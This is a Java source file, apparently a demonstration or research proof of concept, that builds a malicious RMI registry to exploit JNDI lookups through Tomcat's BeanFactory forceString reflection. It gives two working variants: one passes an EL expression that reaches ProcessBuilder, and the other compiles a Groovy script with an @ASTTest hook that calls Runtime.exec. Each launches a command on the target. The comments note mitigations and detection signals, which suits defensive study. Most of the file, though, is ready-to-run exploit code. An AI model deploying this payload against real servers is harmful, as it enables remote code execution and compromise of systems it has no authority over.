package com.jndi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;
import javax.naming.StringRefAddr;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

/**
 * Demonstration RMI registry that serves a JNDI {@code Reference} abusing Tomcat's
 * {@code org.apache.naming.factory.BeanFactory}.
 *
 * <p>The reference only names classes the target already has on its classpath
 * ({@code BeanFactory}, {@code javax.el.ELProcessor}); no remote class is loaded, so
 * the JNDI client's {@code trustURLCodebase} restriction does not stop it. The effective
 * mitigations are never resolving JNDI names derived from untrusted input, and running a
 * Tomcat release in which the {@code forceString} option has been removed from
 * {@code BeanFactory} (NOTE(review): confirm the exact fixed version against the Tomcat
 * changelog). On the detection side, an outbound RMI/LDAP lookup from an application
 * server followed by {@code ELProcessor}/{@code ScriptEngineManager} activity is the
 * signal to alert on.
 */
public class Server {
    /**
     * Starts a local RMI registry on port 1097 and binds the crafted reference under
     * the name {@code evilEL}.
     *
     * @param args unused
     * @throws Exception propagated from registry creation and binding
     */
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);
        // prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,
                "org.apache.naming.factory.BeanFactory", null);
        // redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "x=eval"));
        // the 'x' value is therefore handed to ELProcessor.eval(); the EL below reflects into
        // ScriptEngineManager/ProcessBuilder. Anything eval() accepts is attacker-controlled,
        // which is why the property remapping itself is the vulnerability, not this string.
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")"));
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
        registry.bind("evilEL", referenceWrapper);
    }
}
除了 EL 表达式之外，还可以使用 Groovy，原理相同，代码如下。
/**
 * Groovy variant of the same {@code BeanFactory} {@code forceString} abuse: the setter for
 * property {@code x} is remapped to {@code GroovyClassLoader.parseClass}, so the attached
 * script is compiled on the target, and its {@code @ASTTest} block runs during that
 * compilation. It requires Groovy on the target's classpath. Mitigations match the EL
 * variant: do not resolve JNDI names taken from untrusted input, and keep Tomcat on a
 * release where {@code forceString} is no longer honoured (NOTE(review): confirm the
 * fixed version against the Tomcat changelog).
 *
 * @param args unused
 * @throws Exception propagated from registry creation and binding
 */
public static void main(String[] args) throws Exception {
    System.out.println("Creating evil RMI registry on port 1097");
    Registry registry = LocateRegistry.createRegistry(1097);
    ResourceRef ref = new ResourceRef("groovy.lang.GroovyClassLoader", null, "", "", true,
            "org.apache.naming.factory.BeanFactory", null);
    // remap the 'x' setter to parseClass, see BeanFactory.getObjectInstance
    ref.add(new StringRefAddr("forceString", "x=parseClass"));
    // compile-time AST hook: the assert body executes while parseClass compiles the script
    String script = "@groovy.transform.ASTTest(value={\n"
            + " assert java.lang.Runtime.getRuntime().exec(\"calc\")\n"
            + "})\n"
            + "def x\n";
    ref.add(new StringRefAddr("x", script));
    ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
    registry.bind("evilGroovy", referenceWrapper);
}